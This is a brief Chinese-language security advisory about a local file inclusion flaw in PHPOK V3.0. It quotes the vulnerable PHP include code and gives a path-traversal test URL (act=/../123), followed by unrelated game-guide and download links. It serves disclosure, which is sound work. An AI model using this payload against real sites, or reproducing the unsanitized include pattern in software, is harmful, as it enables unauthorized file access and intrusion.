PHPOK V3.0本地包含漏洞

时间：2011-01-01 来源：心灵

发布日期：2011-01.01
发布作者：心灵

影响版本：PHPOK V3.0
官方网站：http://www.phpok.com

漏洞类型：文件包含
漏洞描述：PHPOK V3.0可直接包含文件

漏洞代码：app\www\control\js.php

function index_f()
{
$act = $this->trans_lib->safe("act");
if(file_exists(ROOT_JS.$act.".php"))
{
include(ROOT_JS.$act.".php");
}
else
{
echo "ERROR";
}
exit();
}

漏洞测试EXP：

http://site/index.php?c=js&f=index&act=/../123

标签分类：

相关阅读更多 +

崩坏星穹铁道银河球棒侠传说魔王篇试用角色成就如何完成_崩坏星穹铁道银河球棒侠传说魔王篇试用角色成就怎么快速完成(崩坏星穹铁道银河棒球侠) 游戏攻略 2025-06-03
迷雾大陆s7魂灵师流派bd要如何搭配_迷雾大陆s7魂灵师流派解析(迷雾怎么组合道具) 游戏攻略 2025-06-03
碧蓝航线科研船换装投影功能用法介绍_碧蓝航线科研船换装投影功能解析(碧蓝航线科研船经验后宅和委托算吗) 游戏攻略 2025-06-02
最终幻想14水晶世界珠串万货街感恩大酬宾任务攻略_最终幻想14水晶世界珠串万货街感恩大酬宾任务要如何完成(最终幻想14水晶世界) 游戏攻略 2025-06-02
坦克世界端午节龙舟活动介绍_坦克世界端午节龙舟活动都有哪些内容游戏攻略 2025-06-02

排行榜更多 +

翌日波奇狗的历险记手机版下载

休闲益智下载

怪兽远征安卓版下载

角色扮演下载

谷歌卫星地图免费版下载

生活实用下载

4
谷歌卫星地图免费版下载
11.98MB · 92℃

1970-01-01

下载
5
kingsofpool官方正版下载
72.37MB · 90℃

1970-01-01

下载
6
毒药轮盘手机版下载
162.05M · 96℃

1970-01-01

下载